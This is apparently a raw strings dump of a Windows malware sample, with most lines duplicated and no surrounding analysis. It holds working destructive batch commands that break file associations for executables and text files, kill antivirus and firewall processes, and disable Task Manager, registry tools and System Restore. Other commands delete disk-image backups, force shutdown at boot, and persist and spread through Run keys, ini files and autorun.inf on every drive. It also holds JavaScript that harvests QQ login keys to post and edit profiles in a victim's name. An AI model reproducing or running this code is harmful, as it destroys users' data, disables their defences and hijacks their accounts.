SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools

Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders

assoc .exe=nullfile

assoc .exe=nullfile

assoc .reg=nullfile

assoc .reg=nullfile

assoc .bat=nullfile

assoc .bat=nullfile

assoc .cmd=nullfile

assoc .cmd=nullfile

assoc .vbs=nullfile

assoc .vbs=nullfile

assoc .txt=nullfile

assoc .txt=nullfile

assoc .com=nullfile

assoc .com=nullfile

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f

reg delete "HKEY_CLASSES_ROOT\bluestacks" /f

reg delete "HKEY_CLASSES_ROOT\bluestacks" /f

reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f

reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f

@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat

@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat

goto 22c:\slears.bat

goto 22c:\slears.bat

.slear

.slear

d:\sleartest.exe

d:\sleartest.exe

adm-music.com

adm-music.com

O%u,%

O%u,%

JÃ·%

JÃ·%

ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP

ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP

fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP

fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP

c:\windows\system32\

c:\windows\system32\

F%*.*f

F%*.*f

CNotSupportedException

CNotSupportedException

commctrl_DragListMsg

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

Afx:%x:%x

COMCTL32.DLL

COMCTL32.DLL

CCmdTarget

CCmdTarget

__MSVCRT_HEAP_SELECT

__MSVCRT_HEAP_SELECT

user32.dll

user32.dll

iphlpapi.dll

iphlpapi.dll

SHLWAPI.dll

SHLWAPI.dll

MPR.dll

MPR.dll

VERSION.dll

VERSION.dll

WSOCK32.dll

WSOCK32.dll

.PAVCException@@

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.prn)|*.prn|

(*.*)|*.*||

(*.*)|*.*||

Shell32.dll

Shell32.dll

Mpr.dll

Mpr.dll

Advapi32.dll

Advapi32.dll

User32.dll

User32.dll

Gdi32.dll

Gdi32.dll

Kernel32.dll

Kernel32.dll

(&07-034/)7 '

(&07-034/)7 '

?? / %d]

?? / %d]

%d / %d]

%d / %d]

: %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

(*.CUR)|*.CUR|

%s:%d

%s:%d

windows

windows

out.prn

out.prn

%d.%d

%d.%d

%d / %d

%d / %d

%d/%d

%d/%d

Bogus message code %d

Bogus message code %d

(%d-%d):

(%d-%d):

%ld%c

%ld%c

VVV.dywt.com.cn

VVV.dywt.com.cn

%s

%s

Reply-To: %s

Reply-To: %s

From: %s

From: %s

To: %s

To: %s

Subject: %s

Subject: %s

Date: %s

Date: %s

Cc: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

%a, %d %b %Y %H:%M:%S

SMTP

SMTP

.PAVCObject@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCResourceException@@

.PAVCUserException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

.PAVCArchiveException@@

zcÃ

zcÃ

c:\%original file name%.exe

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

GetCPInfo

WinExec

WinExec

GetProcessHeap

GetProcessHeap

RegOpenKeyExA

RegOpenKeyExA

RegCreateKeyA

RegCreateKeyA

RegDeleteKeyA

RegDeleteKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

GetViewportExtEx

GetViewportExtEx

ScaleViewportExtEx

ScaleViewportExtEx

SetViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

OffsetViewportOrgEx

SetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

GetViewportOrgEx

ShellExecuteA

ShellExecuteA

GetKeyState

GetKeyState

SetWindowsHookExA

SetWindowsHookExA

GetKeyboardLayout

GetKeyboardLayout

VkKeyScanExA

VkKeyScanExA

keybd_event

keybd_event

CreateDialogIndirectParamA

CreateDialogIndirectParamA

UnhookWindowsHookEx

UnhookWindowsHookEx

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

%FN~/v

%FN~/v

r1.Xj9S/-W

r1.Xj9S/-W

%CGK

%CGK

PAD

PAD

KERNEL32.DLL

KERNEL32.DLL

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

comdlg32.dll

comdlg32.dll

GDI32.dll

GDI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

RASAPI32.dll

RASAPI32.dll

SHELL32.dll

SHELL32.dll

USER32.dll

USER32.dll

WININET.dll

WININET.dll

WINMM.dll

WINMM.dll

WINSPOOL.DRV

WINSPOOL.DRV

WS2_32.dll

WS2_32.dll

(*.*)

(*.*)

1.6.0.0

1.6.0.0

(hXXp://VVV.eyuyan.com)

(hXXp://VVV.eyuyan.com)

%original file name%.exe_1756_rwx_00401000_000E4000:

t$(SSh

t$(SSh

~%UVW

~%UVW

u$SShe

u$SShe

atl.dll

atl.dll

wininet.dll

wininet.dll

kernel32.dll

kernel32.dll

advapi32.dll

advapi32.dll

NTDLL.DLL

NTDLL.DLL

HttpOpenRequestA

HttpOpenRequestA

HttpSendRequestA

HttpSendRequestA

HttpQueryInfoA

HttpQueryInfoA

sleartest.exe

sleartest.exe

dll.bat

dll.bat

\*.dll

\*.dll

exe.bat

exe.bat

\*.exe

\*.exe

&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

&clientkey=

&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

hXXp://ptlogin2.qq.com/jump?clientuin=

hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

skey=

skey=

#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm

#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm

qzreferrer=http://user.qzone.qq.com/

qzreferrer=http://user.qzone.qq.com/

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=

qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=

qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=

hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=

hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=

qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=

qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=

hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=

hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=

SSOAxCtrlForPTLogin.SSOForPTLogin2

SSOAxCtrlForPTLogin.SSOForPTLogin2

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

document.body.innerHTML=GetuinKey();

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http=

http=

https

https

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

HTTP/1.1

hXXp://

hXXp://

len = str.length; i

len = str.length; i

var t = QZONE.FormSender;

var t = QZONE.FormSender;

if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {

if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {

var a = QZFL.string.trim(fm.action);

var a = QZFL.string.trim(fm.action);

a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();

a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();

fm.action = a

fm.action = a

slear && del / f / s / q c:\slear.bat

slear && del / f / s / q c:\slear.bat

c:\slear.bat

c:\slear.bat

cmd.exe

cmd.exe

c:\windows\system\shutdown.bat

c:\windows\system\shutdown.bat

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"

del :\forshotdown.cmd

del :\forshotdown.cmd

shutdown -s -t 0 && del / f / s / q c:\slear.bat

shutdown -s -t 0 && del / f / s / q c:\slear.bat

c:\windows\system32\slear.exe

c:\windows\system32\slear.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

hXXp://VVV.shafou.com

hXXp://VVV.shafou.com

copy %0 %windir%\system32\cmd.bat

copy %0 %windir%\system32\cmd.bat

attrib %windir%\system32\cmd.bat r s h

attrib %windir%\system32\cmd.bat r s h

%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul

%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul

%s% /im norton* /f >nul

%s% /im norton* /f >nul

%s% /im av* /f >nul

%s% /im av* /f >nul

%s% /im fire* /f >nul

%s% /im fire* /f >nul

%s% /im anti* /f >nul

%s% /im anti* /f >nul

%s% /im spy* /f >nul

%s% /im spy* /f >nul

%s% /im bullguard /f >nul

%s% /im bullguard /f >nul

%s% /im PersFw /f >nul

%s% /im PersFw /f >nul

%s% /im KAV* /f >nul

%s% /im KAV* /f >nul

%s% /im ZONEALARM /f >nul

%s% /im ZONEALARM /f >nul

%s% /im SAFEWEB /f >nul

%s% /im SAFEWEB /f >nul

%s% /im OUTPOST /f >nul

%s% /im OUTPOST /f >nul

%s% /im nv* /f >nul

%s% /im nv* /f >nul

%s% /im nav* /f >nul

%s% /im nav* /f >nul

%s% /im F-* /f >nul

%s% /im F-* /f >nul

%s% /im ESAFE /f >nul

%s% /im ESAFE /f >nul

%s% /im cle /f >nul

%s% /im cle /f >nul

%s% /im BLACKICE /f >nul

%s% /im BLACKICE /f >nul

%s% /im def* /f >nul

%s% /im def* /f >nul

%s% /im 360safe.exe /f >nul

%s% /im 360safe.exe /f >nul

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d

for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul

for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul

echo @echo off >d:\setup.bat

echo @echo off >d:\setup.bat

!^.^ >>d:\setup.bat

!^.^ >>d:\setup.bat

echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\

echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\

\a.bat >>d:\setup.bat

\a.bat >>d:\setup.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat

/f >>d:\setup.bat

/f >>d:\setup.bat

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat

HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat

HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat

echo [windows] >> %windir%\win.ini

echo [windows] >> %windir%\win.ini

echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini

echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini

echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini

echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini

echo [boot] >> %windir%\system.ini

echo [boot] >> %windir%\system.ini

echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini

echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini

echo [AutoRun] >d:\autorun.inf

echo [AutoRun] >d:\autorun.inf

echo Open=setup.bat >>d:\autorun.inf

echo Open=setup.bat >>d:\autorun.inf

echo Open=system.bat >>d:\autorun.inf

echo Open=system.bat >>d:\autorun.inf

attrib d:\autorun.inf r s h >>d:\setup.bat

attrib d:\autorun.inf r s h >>d:\setup.bat

attrib d:\setup.bat r s h >>d:\setup.bat

attrib d:\setup.bat r s h >>d:\setup.bat

start d:\setup.bat /min >nul

start d:\setup.bat /min >nul

echo @echo off >>C:\AUTOEXEC.BAT

echo @echo off >>C:\AUTOEXEC.BAT

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d

C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT

C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d

/f >>C:\AUTOEXEC.BAT

/f >>C:\AUTOEXEC.BAT

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat

echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT

echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT

copy %0 %systemroot%\windows.bat >nul

copy %0 %systemroot%\windows.bat >nul

if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat

if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat

if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat

if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat

if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat

if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat

C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat

C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat

/f >>%windir%/system32/explorer.bat

/f >>%windir%/system32/explorer.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %

windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat

windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %

windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat

windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat

echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat

echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat

attrib %windir%/system32/explorer.bat r s h%

attrib %windir%/system32/explorer.bat r s h%

attrib %systemroot%/windows.bat r s h

attrib %systemroot%/windows.bat r s h

for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat

for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat

for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat

for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat

for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat

for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat

for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf

for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf

for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf

for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf

copy %0 d:\Program" "Files\run.bat

